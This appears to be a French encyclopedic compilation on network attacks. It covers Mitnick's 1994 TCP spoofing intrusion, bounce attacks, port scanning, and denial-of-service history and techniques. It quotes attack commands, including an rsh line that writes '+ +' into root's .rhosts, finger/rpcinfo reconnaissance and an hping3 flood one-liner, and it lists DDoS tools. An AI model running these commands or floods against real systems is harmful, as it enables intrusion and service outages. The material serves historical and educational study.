Rendre silencieux l'hôte de confiance Arrivé à ce stade, il reste quand même un petit problème d'ordre pratique. Étant donné que la cible renvoie le paquet SYN/ACK à l'hôte de confiance et que ce dernier n'a pas fait de demande de connexion, il va envoyer à la cible un paquet RESET avortant la demande de connexion. L'attaquant doit donc répondre avant que ce paquet n'arrive à la cible. Or un problème se pose par exemple si ces deux sites se trouvent sur le même réseau local, mais pas l'attaquant, le temps de réponse de ce dernier sera probablement supérieur à celui de l'hôte de confiance. L'attaquant doit donc s'arranger pour que l'hôte de confiance ne puisse pas répondre au paquet envoyé par la cible. L'attaquant va donc mettre hors service l'hôte de confiance pendant la durée de sa procédure de connexion à la cible. Il peut par exemple envoyer une grande quantité de paquets SYN à ce dernier, mais ne pas effectuer la dernière étape de la procédure de demande de connexion. L'hôte ne pourra plus alors traiter d'autres demandes de connexion pendant un certain temps, car toutes les ressources disponibles sont déjà occupées[2]. Cette attaque est appelée SYN flooding. À noter que l'attaquant n'est pas obligé de mettre sa véritable adresse IP dans les paquets envoyés pour pouvoir masquer ses traces.

(hors service) ┌────────────┐ ┌────────────┐ SYN/ACK │ HOTE │ │ CIBLE ╞════════>>═════════╡ de │ └─────┬──────┘ │ CONFIANCE │ │ └────────────┘ │ │ │ │ │ inondation de SYN │ │ │ │ │ SYN ┌────────────┐ └─────────────<<───────────┤ ATTAQUANT │ └────────────┘ Attaque de Mitnick 52

Description de l'attaque La date de l'attaque choisie par Mitnick à savoir le jour de Noël 1994 n'est pas anodine. Il peut ainsi être à peu près sûr que personne ne sera connecté au réseau cible lui donnant plus de latitude dans sa tentative d'intrusion. Il va d'abord se livrer à une collecte d'informations sur le réseau sur lequel il cherche à s'introduire. Il commence par sonder la machine ARIEL à l'aide de la commande UNIX finger à partir du site toad.com :

14:09:32 toad.com# finger -l @ARIEL

La commande finger permet de savoir qui est connecté au système, l'instant de connexion de la personne, l'instant de sa précédente connexion, l'endroit d'où elle se connecte, le temps durant lequel elle a été au repos, si la personne a un courrier. Il découvre alors qu'ARIEL est actuellement connecté à ASTARTE, RIMMON et OSIRIS. Il sonde alors à son tour RIMMON et se renseigne en particulier sur le super-utilisateur root du système : 14:10:21 toad.com# finger -l @RIMMON

14:10:50 toad.com# finger -l root@RIMMON

Il inspecte enfin OSIRIS qui est la station de travail de Tsutomu Shimomura : 14:11:07 toad.com# finger -l @OSIRIS

14:11:38 toad.com# showmount -e OSIRIS

14:11:49 toad.com# rpcinfo -p OSIRIS

14:12:05 toad.com# finger -l root@OSIRIS

La commande showmount -e permet de savoir les systèmes de fichiers exportés avec Network File System sur le site. Les crackers s'intéressent surtout à ceux qui peuvent être lus et écrits par tout le monde. Tandis que la commande rpcinfo renseigne sur les services d'appel de procédures à distance (RPC) disponibles sur le système. Mitnick découvre en particulier qu'OSIRIS autorise la commande rsh. En se renseignant enfin avec finger, sur le super-utilisateur root, il découvre une connexion en provenance de RIMMON. Il suppose donc l'existence d'une liaison de confiance entre OSIRIS et RIMMON pour l'utilisateur root[3]. Mitnick va maintenant essayer de connaître le comportement du générateur de numéros de séquence TCP dOSIRIS. Pour cela il va lui envoyer vingt tentatives de connexion à partir du site apollo.it.luc.edu. Les numéros de séquence initiaux (Initial Sequence Number) étant incrémentés à chaque tentative de connexion. Afin de ne pas saturer le fil de connexions dOSIRIS, ce qui le mettrait hors service, un paquet RESET est envoyé en réponse à chaque paquet SYN/ACK envoyé par ce dernier. Il découvre ainsi que pour deux tentatives de connexion successives, la différence entre les numéros de séquence des paquets SYN/ACK envoyés par OSIRIS est de 128 000. Si est donc le numéro de séquence du dernier paquet SYN du groupe de paquet envoyé précédemment et celui du paquet SYN/ACK correspondant, sera le numéro de séquence du paquet SYN/ACK en réponse à un paquet SYN de numéro de séquence . (hors service) (Nack+128 000) ┌────────────┐ SYN/ACK ┌────────────┐ │ OSIRIS ╞════════>>═════════╡ RIMMON │ └─────┬──────┘ │ │ │ │┌────┐┌────┐│ │ ││ ││ ││ Attaque de Mitnick 53

│ inondation de SYN │ ││ ││ ││ │ │└────┘└────┘│ │ (Nsyn+1) │ │ │ SYN │ APOLLO │ └────────────<<────────────┤ (Mitnick) │ └────────────┘

Tous les ingrédients sont maintenant mis en place pour mettre en œuvre une attaque par spoofing. Mitnick commence par inonder de SYN le fil de connexions de RIMMON 14 secondes avant l'attaque principale mettant la machine dans l'incapacité de traiter d'autres connexions. À 14:18:36, il envoie ensuite à OSIRIS un paquet SYN de demande de connexion de numéro de séquence , mais dont l'adresse source de l'en-tête IP est celle de RIMMON. Il établit ensuite la connexion en envoyant un paquet ACK dont le numéro d'acquittement est . Pour OSIRIS, tout se passe de manière transparente comme si c'était l'utilisateur root de RIMMON qui avait fait une demande de connexion. Mitnick vient donc de prendre le contrôle d'une session TCP censée s'établir entre OSIRIS et RIMMON[4]. Ce dernier étant dans l'incapacité temporaire de répondre à des demandes de connexion. Il ne reste plus alors à l'attaquant qu'à ouvrir une brèche sur OSIRIS lui permettant de l'explorer ultérieurement. Mitnick lui envoie alors la commande suivante : 14:18:37 [root@apollo /tmp]#rsh OSIRIS "echo + + >>/.rhosts"

Cette commande rajoute la ligne + + dans le fichier /.rhosts d'OSIRIS. Il en résulte que dorénavant OSIRIS accepte n'importe qui à se connecter en tant que root sur le système. Le système est maintenant compromis. Mitnick met alors fin à la connexion, car désormais il peut inspecter à sa guise la machine de Shimomura. Il libère enfin le fil de connexions de RIMMON en envoyant des paquets RESET pour ne pas éveiller le soupçon de quelqu'un qui essaierait de se connecter et qui ne pourrait pas.

Conclusion Une fois la mise en œuvre pratique de cette technique exposée au grand public, elle a connu une large diffusion. D'autres hackers malveillants se sont alors chargés de coder des outils permettant d'automatiser l'attaque. L'utilisation de la technique s'est alors intensifiée. Seulement de nos jours, pour « inonder » le fil de connexions d'un serveur, il faut envoyer beaucoup plus de paquets SYN. De plus, le serveur peut bloquer le trafic provenant d'un hôte qui effectue de multiples demandes de connexion dans un laps de temps très court. Et enfin, un système de détection d'intrusion peut détecter de multiples demandes de sessions provenant d'un hôte qui renvoie systématiquement un RESET et avertir l'administrateur système sur le fait que quelqu'un essaie sûrement de deviner le comportement du générateur de numéro de séquence d'un site. Par ailleurs, le service, fingerd, sur lequel se base une partie de la recherche d'informations, a presque disparu à l'heure actuelle ; les rares distributions l'intégrant toujours ne l'activent pas. Attaque de Mitnick 54

Notes

[1] Voir le courrier [email protected] posté par Tsutomu Shimomura dans le forum [news://comp.security.misc comp.security.misc] datant du 25 janvier 1995 [2] Voir Attaque par déni de service [3] RIMMON est plus précisément un serveur X pour OSIRIS qui est une station de travail sans disque. Les deux machines sont des SPARC tournant sous Solaris 1. [4] La connexion se fait en fait de manière unilatérale, car Mitnick ne peut pas recevoir de paquets envoyés par OSIRIS.

Attaque par rebond

Les attaques par rebond constituent une famille d'attaques de système d'information qui consistent à utiliser un ou des systèmes intermédiaires, participant à leur insu, et permettant à un assaillant de rester caché.

Exemple d'utilisation de l'attaque par rebond Le smurf est une attaque par rebond. Celle-ci permet à un pirate de causer un déni de service. L'assaillant utilise l'IP spoofing pour envoyer des requêtes ICMP echo request (ping) à plusieurs machines qui vont alors servir de rebonds. Il utilise l'adresse IP source d'une machine qu'il veut mettre hors service pour envoyer ses requêtes. Toutes les machines répondront à l'adresse IP « spoofée » (usurpée).

Création d'un canal caché par rebonds Les machines rebonds peuvent également être utilisées pour établir un canal caché entre deux machines. À titre d'illustration, imaginons un pirate A souhaitant communiquer discrètement avec une machine B. A va utiliser une machine rebond C. A envoie un paquet de demande de connexion ( TCP SYN ) à la machine C en utilisant comme adresse de réponse, l'adresse de B et comme numéro de séquence X contenant les informations à transmettre. La machine C répond alors à B ( TCP SYN/ACK ) en répétant le numéro de séquence x. B récupère les informations et valide éventuellement la connexion pour que cela reste le plus discret possible (TCP ACK). Ce genre de canal reste très difficile à détecter. Balayage de port 55 Balayage de port

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

En informatique, le balayage de port (port scanning en anglais) est une technique servant à rechercher les ports ouverts sur un serveur de réseau. Cette technique est utilisée par les administrateurs des systèmes informatiques pour contrôler la sécurité des serveurs de leurs réseaux. La même technique est aussi utilisée par les pirates informatiques pour tenter de trouver des failles dans des systèmes informatiques. Un balayage de port (port scan ou portscan en anglais) effectué sur un système tiers est généralement considéré comme une tentative d'intrusion, car un balayage de port sert souvent à préparer une intrusion. Le balayage de ports est une des activités considérées comme suspectes par un système de détection d'intrusion. Un système de détection d'intrusion peut être réglé à différents niveaux de sensibilité. Un niveau de sensibilité élevé génèrera plus de fausses alertes, un niveau de sensibilité bas risque de laisser passer les balayages effectués par des systèmes sophistiqués comme Nmap qui disposent de diverses options pour camoufler leurs balayages. Pour tromper la vigilance des systèmes de détection et des pare-feu, les balayages peuvent se faire dans un ordre aléatoire, avec une vitesse excessivement lente (par exemple sur plusieurs jours), ou à partir de plusieurs adresses IP. Les balayages de ports se font habituellement sur le protocole TCP ; néanmoins, certains logiciels permettent aussi d'effectuer des balayages UDP. Cette dernière fonctionnalité est beaucoup moins fiable, UDP étant orienté sans connexion, le service ne répondra que si la requête correspond à un modèle précis variant selon le logiciel serveur utilisé.

Techniques

TCP Un balayage de ports vise typiquement le protocole TCP, car c'est celui qui est utilisé par la majorité des applications. L'objectif du balayage est de savoir si un logiciel est en écoute sur un numéro de port donné. Si un logiciel écoute, on dit que le port est ouvert, sinon on dit qu'il est fermé. Le balayage d'un port se passe en deux étapes : 1. l'envoi d'un paquet sur le port testé ; 2.2.l'analyse de la réponse. Il existe de nombreuses variantes pour le paquet émis. Il y a le paquet valide selon la norme TCP, le paquet « TCP SYN », et les paquets invalides. L'utilisation des paquets invalides vise à tromper les systèmes de détection d'intrusion. La liste des paquets invalides utilisés est : •• ACK ; •• FIN ; • Maimon[1] (FIN/ACK) ; •• NULL (aucun) ; • Xmas[2] (tous) ; • Window (ACK). Le serveur peut répondre de différentes manières : •• ouverture de connexion acceptée : envoi d'un paquet TCP SYN/ACK ; •• fermeture de la connexion : envoi d'un paquet TCP RST ; Balayage de port 56

• absence de réponse : on dit que le paquet est droppé. La réponse ouverture de connexion acceptée indique clairement que le port est ouvert. La réponse fermeture de la connexion indique que le port est fermé. L'absence de réponse est souvent due à un pare-feu qui vise à contrer le balayage de port. Le pare-feu peut détecter un trafic anormal et décider d'ignorer pendant un certain temps tous les paquets provenant de la machine générant le trafic anormal. En absence de réponse, on ne peut donc pas savoir avec certitude si le port est ouvert ou fermé. La technique Window envoie un paquet TCP ACK et observe la taille de la fenêtre TCP du paquet de réponse (TCP RST). Si le port est fermé, la taille de la fenêtre de la réponse est nulle. La technique Mainon est utilisée sur les systèmes BSD. Uriel Maimon a constaté que ces systèmes ignorent un paquet TCP FIN/ACK (invalide) si le port est ouvert au lieu d'envoyer la réponse TCP RST.

Autres techniques pour TCP Une autre technique consiste à passer par un serveur FTP. On utilise la fonctionnalité de serveur mandataire des serveurs FTP pour balayer les ports. Enfin, la technique Idle scanning utilise l'identifiant de fragmentation du protocole IP. Un système de détection d'intrusion pense que l'analyse provient d'un ordinateur zombi. Consultez l'article (en) Idle Scanning and Related IPID Games [3] pour plus de renseignements.

UDP et IP Pour le protocole UDP, on envoie un paquet UDP vide (de longueur nulle). Si le port est fermé, un message ICMP de type 3 (destinataire inaccessible) et code 3 est envoyé. Il est également possible de lister les protocoles IP pris en charge par un hôte. On appelle cette technique IP protocol scan.

Version du logiciel On peut détecter le système d'exploitation et sa version par la prise d'empreinte de la pile TCP/IP. Un logiciel tel que Nmap permet également de détecter le nom du logiciel écoutant sur un port, voire sa version.

Balayeurs de ports en ligne • DerKeiler's Port Scanner [4] Peut seulement balayer votre adresse IP, utile lorsque vous êtes dans un café Internet avec plusieurs restrictions • AuditMyPC Free Port Scanning [5] Peut balayer les 65535 ports

Balayeurs de ports hors ligne • AutoScan-Network [6] Utilitaire libre de surveillance de réseau. • Network Security Auditor [7] Utilitaire gratuit de surveillance de réseau. • nmap [8] Utilitaire de surveillance de réseau open source. Balayage de port 57

Références

[1] La technique Maimon porte le nom de son auteur, Uriel Maimon. Elle a été publiée dans le magazine électronique Phrack, numéro 49. [2] La technique Xmas (abréviation de Christmas, Noël en anglais) a été nommée ainsi en souvenir de l'attaque du serveur de Tsutomu Shimomura par Kevin Mitnick le jour de Noël 1994. Lire l'article sur Kevin Mitnick pour les détails.

[3] http:/ / insecure. org/ nmap/ idlescan. html

[4] http:/ / www. derkeiler. com/ Service/ PortScan/

[5] http:/ / www. auditmypc. com/ freescan/ scanoptions. asp

[6] http:/ / autoscan-network. com

[7] http:/ / www. nsauditor. com/ network_tools/ free_port_scanner. html?affiche=Produits& affiche2=Nsauditor

[8] http:/ / nmap. org/

Attaque par déni de service

Une attaque par déni de service (denial of service attack, d'où l'abréviation DoS) est une attaque informatique ayant pour but de rendre indisponible un service, d'empêcher les utilisateurs légitimes d'un service de l'utiliser. Il peut s'agir de : • l’inondation d’un réseau afin d'empêcher son fonctionnement ; •• la perturbation des connexions entre deux machines, empêchant l'accès à un service particulier ; •• l'obstruction d'accès à un service à une personne en particulier. L'attaque par déni de service peut ainsi bloquer un serveur de fichiers, rendre impossible l'accès à un serveur web ou empêcher la distribution de courriel dans une entreprise. L'attaquant cracker n'a pas forcément besoin de matériel sophistiqué. Ainsi, certaines attaques DOS peuvent être exécutées avec des ressources limitées contre un réseau beaucoup plus grand et moderne. On appelle parfois ce type d'attaque « attaque asymétrique » (en raison de la différence de ressources entre les protagonistes). Un cracker avec un ordinateur obsolète et un modem lent peut ainsi neutraliser des machines ou des réseaux beaucoup plus importants. Les attaques en déni de service se sont modifiées au cours du temps (voir historique). Tout d'abord, les premières n'étaient perpétrées que par un seul « attaquant » ; rapidement, des attaques plus évoluées sont apparues, impliquant une multitude de « soldats », aussi appelés « zombies ». On parle alors de DDoS (distributed denial of service attack). Ensuite, les attaques DoS et DDoS étaient perpétrées par des crackers seulement attirés par l’exploit et la renommée. Ainsi, certains crackers se sont spécialisés dans la « levée » d’armées de « zombies », qu’ils peuvent ensuite louer à d’autres crackers pour attaquer une cible particulière. Avec la forte augmentation du nombre d’échanges commerciaux sur Internet, le nombre de chantages au déni de service a très fortement progressé[1] (un cracker lance une attaque en DoS ou DDoS contre une entreprise et lui demande une rançon pour arrêter cette attaque).

Historique

Cette section ne cite pas suffisamment ses sources (février 2010). Pour l'améliorer, ajouter en note des références vérifiables ou les modèles {{refnec}} ou {{refsou}} sur les passages nécessitant une source. Les attaques par déni de service ont vu le jour dans les années 1980. Les DDoS (ou attaques DoS Distribuées) seraient plus récentes : la première attaque DDoS officielle a eu lieu en août 1999[2] : un outil appelé « Trinoo DDO » (décrit ci-dessous) a été déployé dans au moins 227 systèmes, dont 114 étaient sur Internet, pour inonder les serveurs de l'université du Minnesota. À la suite de cette attaque, l'accès internet de l'université est resté bloqué pendant plus de deux jours. La première attaque DDOS médiatisée dans la presse grand public a eu lieu en février 2000, causé par Michael Calce, mieux connu sous le nom de Mafiaboy. Le 7 février, Yahoo! a été victime d'une attaque DDOS qui a rendu Attaque par déni de service 58

son portail Internet inaccessible pendant trois heures. Le 8 février, Amazon.com, Buy.com, CNN et eBay ont été touchés par des attaques DDOS qui ont provoqué soit l'arrêt soit un fort ralentissement de leur fonctionnement. Le 9 février, E-Trade et ZDNet ont à leur tour été victimes d’attaques DDOS. Les analystes estiment que durant les trois heures d'inaccessibilité, Yahoo! a subi une perte sur le commerce électronique et les recettes publicitaires s'élevant à environ 500 000 $. Selon Amazon.com, son attaque a entraîné une perte de 600 000 $ sur 10 heures. Au cours de l'attaque, eBay.com est passé de 100 % de disponibilité à 9,4 % ; CNN.com est passé au-dessous de 5 % du volume normal ; Zdnet.com et ETrade.com étaient, eux, pratiquement inaccessibles. Schwab.com, le site en ligne du courtier Charles Schwab, a également été touché mais il a refusé de donner des chiffres exacts sur ses pertes. On peut seulement supposer que, dans une société qui fait 2 milliards de dollars par semaine sur les métiers en ligne, la perte n’a pas été négligeable. Michael Calce, celui qui a piraté Amazon.com, Yahoo!, CNN et Ebay, fut condamné à 8 mois dans un centre de détention pour jeune (il n'avait que 15 ans au moment des faits). En septembre 2001, un certain virus Code Red[3] infecte quelques milliers de systèmes, et une seconde version, intitulée Code Red II, installe un agent DDOS. Les rumeurs prétendent qu'il devait lancer une attaque contre la Maison-Blanche. Dans un contexte politique de crise, le gouvernement américain annonce que des mesures de sécurité vont être entreprises. Mais dès l'été 2002, c'est au tour d'Internet de subir une attaque DDOS à l'encontre de ses 13 serveurs racines. Ces serveurs sont les points clés du système d'aiguillage de l'Internet, appelé Domain Name System (DNS). Cette attaque ne durera qu'une heure mais aurait pu paralyser l'ensemble du réseau Internet. L'incident est pris au sérieux par les experts qui affirment renforcer à l'avenir la sécurité de leurs machines. La première version de Slapper, apparue à la mi-septembre 2002, a contaminé plus de 13 000 serveurs Linux en deux semaines. Slapper utilise un trou de sécurité présent dans le module OpenSSL1, et véhicule un agent DDOS. Celui-ci est détecté et stoppé à temps. Malgré tout, le lundi 21 octobre 2002, une nouvelle attaque DOS bloque 9 des 13 serveurs clefs, rendant leurs ressources inaccessibles pendant trois heures. Une partie des entreprises et organismes gérant ces serveurs clés réagit et décide de revoir leurs dispositifs de sécurité. Le FBI a ouvert une enquête, mais localiser le ou les auteurs de l'attaque s'annonce difficile. Peu de temps après des serveurs de bases de données Microsoft SQL Server, mal configurés, sont infectés par le ver SQL Slammer. Ce dernier transporte un agent DDOS qui lance une attaque le 25 janvier 2003 contre Internet. Cette fois ci, seuls 4 des 13 serveurs racines ont été affectés. Malgré la virulence de l'attaque, la performance globale du réseau a été à peine réduite de 15 %.

Types d'attaques On appelle « attaque par déni de service » toutes les actions ayant pour résultat la mise hors-ligne d'un serveur. Techniquement, couper l'alimentation d'un serveur dans un but malfaisant peut-être considéré comme une attaque par déni de service. Dans les faits, les attaques par déni de service sont opérées en saturant un des éléments du serveur ciblé.

Exploitation des failles ou des limites des machines Une des attaques les plus courantes consistait à envoyer un paquet ICMP de plus de 65 535 octets. Au-dessus de cette limite, les piles IP ne savaient pas gérer le paquet proprement, ce qui entrainait des erreurs de fragmentation UDP, ou encore les paquets TCP contenant des « flags » illégaux ou incompatibles. Les piles actuelles résistent à ce type d’attaques. Néanmoins, les délais de traitement de ce genre de paquets restent plus longs que ceux nécessaires pour traiter les paquets légitimes. Ainsi, il devient commun voire trivial de générer une consommation excessive de processeur (CPU) par la simple émission de plusieurs centaines de milliers d’anomalies par seconde, ce qu’un outil tel que hping3 permet en une unique ligne de commande… Attaque par déni de service 59

ex : [root@localhost root]# hping3 -SARFU -L 0 -M 0 -p 80 www.cible.com --flood Avec l'arrivée du haut débit et l'augmentation de la puissance des ordinateurs personnels, le potentiel d'attaque a été décuplé, mettant en évidence la faiblesse des installations développées il y a plusieurs années. Cette augmentation permet à quasiment toutes les anomalies d’être à l’origine d’un déni de service, pourvu qu’elles soient générées à un rythme suffisamment important. Par exemple : • l’usage des champs « réservés » de l’en-tête TCP • le positionnement d’un numéro de séquence d’accusé de réception dans un paquet SYN • des paquets dont l’en-tête de couche 4 (TCP/UDP) est tronqué en dépit de checksums corrects

Attaque par déni de service SYN Flood Article détaillé : SYN flood. Une attaque SYN Flood est une attaque visant à provoquer un déni de service en émettant un nombre important de demandes de synchronisation TCP incomplète avec un serveur. Quand un système (client) tente d'établir une connexion TCP vers un système offrant un service (serveur), le client et le serveur échangent une séquence de messages. Le système client commence par envoyer un message SYN au serveur. Le serveur reconnaît ensuite le message en envoyant un SYN-ACK message au client. Le client finit alors d’établir la connexion en répondant par un message ACK. La connexion entre le client et le serveur est alors ouverte, et le service de données spécifiques peut être échangé entre le client et le serveur. Voici une vue de ce flux de messages :

Client Serveur ------SYN ------→ ← ------SYN-ACK ACK ------→

Le risque d'abus se pose à l'endroit où le système de serveur a envoyé un accusé de réception (SYN-ACK) au client, mais ne reçoit pas le message ACK. Le serveur construit dans sa mémoire système une structure de données décrivant toutes les connexions. Cette structure de données est de taille finie, et elle peut être débordée en créant intentionnellement trop de connexions partiellement ouvertes. Créer des connexions semi-ouvertes s’accomplit facilement avec l'IP spoofing. Le système de l'agresseur envoie des messages SYN à la machine victime ; ceux-ci semblent être légitimes, mais font référence à un système client incapable de répondre au message SYN-ACK. Cela signifie que le message ACK final ne sera jamais envoyé au serveur victime. Normalement il y a un délai d'attente associé à une connexion entrante, les semi-connexions ouvertes vont expirer et le serveur victime pourra gérer l’attaque. Toutefois, le système agresseur peut simplement continuer à envoyer des paquets IP falsifiée demandant de nouvelles connexions, plus rapides que le serveur victime. Dans la plupart des cas, la victime aura des difficultés à accepter toute nouvelle connexion réseau entrante. Dans ces cas, l'attaque n'affecte pas les connexions entrantes, ni la possibilité d'établir des connexions réseau sortant. Toutefois, le système peut saturer la mémoire, ce qui provoque un crash rendant le système inopérant. Attaque par déni de service 60

UDP Flooding Ce déni de service exploite le mode non connecté du protocole UDP. Il crée un "UDP Packet Storm" (génération d’une grande quantité de paquets UDP) soit à destination d’une machine soit entre deux machines. Une telle attaque entre deux machines entraîne une congestion du réseau ainsi qu’une saturation des ressources des deux hôtes victimes. La congestion est plus importante du fait que le trafic UDP est prioritaire sur le trafic TCP. En effet, le protocole TCP possède un mécanisme de contrôle de congestion, dans le cas où l’acquittement d’un paquet arrive après un long délai, ce mécanisme adapte la fréquence d’émission des paquets TCP et le débit diminue. Le protocole UDP ne possède pas ce mécanisme. Au bout d’un certain temps, le trafic UDP occupe donc toute la bande passante, ne laissant qu’une infime partie au trafic TCP. L’exemple le plus connu d’UDP Flooding est le « Chargen Denial of Service Attack ». La mise en pratique de cette attaque est simple, il suffit de faire communiquer le service chargen d’une machine avec le service echo d’une autre. Le premier génère des caractères, tandis que le second se contente de réémettre les données qu’il reçoit. Il suffit alors au cracker d’envoyer des paquets UDP sur le port 19 (chargen) à une des victimes en usurpant l’adresse IP et le port source de l’autre. Dans ce cas, le port source est le port UDP 7 (echo). L’UDP Flooding entraîne une saturation de la bande passante entre les deux machines, il peut donc neutraliser complètement un réseau.

Packet Fragment Les dénis de service de type Packet Fragment utilisent des faiblesses dans l’implémentation de certaines piles TCP/IP au niveau de la défragmentation IP (ré-assemblage des fragments IP). Une attaque connue utilisant ce principe est Teardrop. L’offset de fragmentation du second fragment est inférieur à la taille du premier ainsi que l’offset plus la taille du second. Cela revient à dire que le deuxième fragment est contenu dans le premier (overlapping). Lors de la défragmentation, certains systèmes ne gèrent pas cette exception et cela entraîne un déni de service. Il existe des variantes de cette attaque : bonk, boink et newtear. Le déni de service Ping of Death exploite une mauvaise gestion de la défragmentation au niveau ICMP, en envoyant une quantité de données supérieure à la taille maximum d’un paquet IP. Ces différents dénis de services aboutissent à un crash de la machine cible.

Smurfing Cette attaque utilise le protocole ICMP. Quand un ping (message ICMP ECHO) est envoyé à une adresse de broadcast (par exemple 10.255.255.255), celui-ci est démultiplié et envoyé à chacune des machines du réseau. Le principe de l’attaque est de truquer les paquets ICMP ECHO REQUEST envoyés en mettant comme adresse IP source celle de la cible. Le cracker envoie un flux continu de ping vers l’adresse de broadcast d’un réseau et toutes les machines répondent alors par un message ICMP ECHO REPLY en direction de la cible. Le flux est alors multiplié par le nombre d’hôte composant le réseau. Dans ce cas tout le réseau cible subit le déni de service, car l’énorme quantité de trafic générée par cette attaque entraîne une congestion du réseau. Attaque par déni de service 61

Programmes disponibles sur Internet • Ping ’O Death : il s’agit de saturer un routeur ou un serveur en envoyant un nombre important de requêtes ”ICMP REQUEST” dont les datagrammes dépassent la taille maximum autorisée. Des patches existent afin de se prémunir de ce type d’agression sous les systèmes MacOs, Windows NT/9x, Sun [Oracle] Solaris, Linux et Novell Netware. • Land - Blat : il s’agit d’envoyer un paquet forgé (spoofé) contenant le flag SYN sur un port donné (comme 113 ou 139 par exemple) et de définir la source comme étant l’adresse de la station cible. Il existe un certain nombre de patches pour ce ”bug” pour les systèmes UNIX et Windows. • Jolt : spécialement destinée aux systèmes Microsoft (NT, 9x et 2000), cette attaque permet de saturer le processeur de la station qui la subit. La fragmentation IP provoque, lorsque l’on envoie un grand nombre de fragments de paquets identiques (150 par seconde), une saturation totale du processeur durant toute la durée de l’attaque. Des pré-patches existent déjà pour tenter de contrer ce type d’attaque. • TearDrop - SynDrop : problème découvert dans l’ancien noyau du système Linux dans la partie concernant la fragmentation des paquets IP. Il s’agit d’un problème de reconstruction du paquet. Lorsque le système reconstitue le paquet, il exécute une boucle qui va permettre de stocker dans un nouveau ”buffer” tous les paquets déjà reçus. Il y a effectivement un contrôle de la taille du paquet mais uniquement si ce dernier est trop grand. S’il est trop petit cela peut provoquer un problème au niveau du noyau et planter le système (problème d’alignement des paquets). Ce problème a également été observé sur les systèmes Windows (NT/9x) et des patches sont dès à présent disponibles. • Ident Attack : ce problème dans le daemon identd permet aisément de déstabiliser une machine UNIX qui l’utilise. Un grand nombre de requêtes d’autorisation entraine une instabilité totale de la machine. Pour éviter cela, il faut installer une version plus récente du daemon identd ou alors utiliser le daemon pidentd-2.8a4 (ou ultérieur). • Bonk - Boink : même problème que le TearDrop mais légèrement modifié afin de ne pas être affecté par les patches fournis pour le TearDrop. Il existe de nouveaux patches mieux construits qui permettent également d’éviter ce nouveau type d’attaque. • Smurf : ce programme utilise la technique de l’”ICMP Flood” et l’amplifie de manière à créer un véritable désastre sur la (ou les) machines visées. En fait, il utilise la technique du ”Broadcast Ping” afin que le nombre de paquets ICMP envoyés à la station grandisse de manière exponentielle causant alors un crash presque inévitable. Il est difficile de se protéger de ce type d’attaque, il n’existe aucun patch mais des règles de filtrage correctes permettent de limiter son effet. • WinNuke : il s’agit d’un programme permettant de ”crasher” les systèmes Windows NT/95 par l’envoi de données de type ”OOB” (Out Of Band) lors d’une connexion avec un client Windows. NetBIOS semble être le service le plus vulnérable à ce type d’attaque. Apparemment, Windows ne sait comment réagir à la réception de ce type de paquet et ”panique” . De nombreux patches existent contre ce type d’attaque et les versions postérieures de Windows (à partir de Windows 98/2000) sont dès à présent protégées. • SlowLoris : Un script en Perl ciblant les serveurs web. Attaque par déni de service 62

Déni de service distribué ou effet de levier

Motivation Compte tenu des performances actuelles des serveurs et de la généralisation des techniques de répartition de charge et de haute disponibilité, il est quasiment impossible de provoquer un déni de service simple comme décrit dans le chapitre précédent. Il est donc souvent nécessaire de trouver un moyen d’appliquer un effet multiplicateur à l’attaque initiale.

Principe

Le principe est d’utiliser plusieurs sources (daemons) pour l’attaque et des maîtres (masters) qui les contrôlent. Le cracker utilise des maîtres pour contrôler plus facilement les sources. En effet, il a besoin de se connecter (en TCP) aux maîtres pour configurer et préparer l’attaque. Les maîtres se contentent d’envoyer des commandes aux sources en UDP. S’il n’y avait pas les maîtres, le cracker serait obligé de se connecter à chaque source. La source de l’attaque serait détectée plus facilement et sa mise en place beaucoup plus longue. Chaque daemon et master discutent en échangeant des messages spécifiques selon l’outil utilisé. Ces communications peuvent même être cryptées et/ou authentifiées. Pour installer les daemons et les masters, le cracker utilise des failles connues (buffer overflow sur des services RPC, FTP ou autres).

L’attaque en elle-même est un SYN Flooding, UDP Flooding ou autre Smurf Attack. Le résultat d’un déni de service est donc de rendre un réseau inaccessible. Réseaux DDOS

Outils Les outils de DDoS (Distributed Denial of Service) les plus connus sont :

Outils DDOS

Logiciel Types d'attaques

Trinoo UDP flooding

Tribe Flood Network (TFN) et TFN2k UDP/TCP/TCP SYN flooding, Smurf

Stacheldraht UDP/TCP/TCP SYN flooding, Smurf

Schaft UDP/TCP/ICMP flooding

MStreamT CP ACK flooding

LOIC (Low Orbit Ion Cannon) TCP/UDP/HTTP

HOIC (High Orbit Ion Cannon) (version plus évoluée de LOIC) TCP/UDP/HTTP

WebLoic (LOIC pour Android) TCP/UDP/HTTP Attaque par déni de service 63

Inconvénients L’inconvénient dans ce cas est la nécessité de travailler en deux temps : 1.1.Mass-cracker les systèmes destinés à héberger les zombies. 2.2.Lancer les ordres. À la deuxième étape le paquet de commande peut être bloqué par un outil de détection ou de filtrage. Par conséquent l’évolution consiste à automatiser le lancement des commandes dès la corruption des systèmes relais. Cette technique a été implémentée par CodeRed dont l’objectif était de faire connecter les serveurs corrompus au site Web de la maison blanche à une date précise. Dans le même ordre d’idées les DDoS basées sur les canaux IRC comme canaux de communication. L’objectif est ici non plus d’établir une connexion directe entre le maitre et les zombies, mais d’utiliser un serveur IRC (ou plutôt un canal) comme relais. Cette méthode, initiée en juillet et août 2001 par Knight et Kaiten, présente de nombreux avantages : • Les commandes sont transmises d’une manière asynchrone via un flux « sortant », qu’il s’agisse du point de vue du maitre ou de l’agent. Il est donc plus probable que le zombie puisse obtenir ses ordres ; • avec le support SSL il est impossible de détecter les commandes passées, et par conséquent d’identifier le canal IRC servant de relais. De la même manière le maître est quasi-indétectable ; • l’attaquant dispose d’une plate-forme de relais (le canal IRC) distribuée.

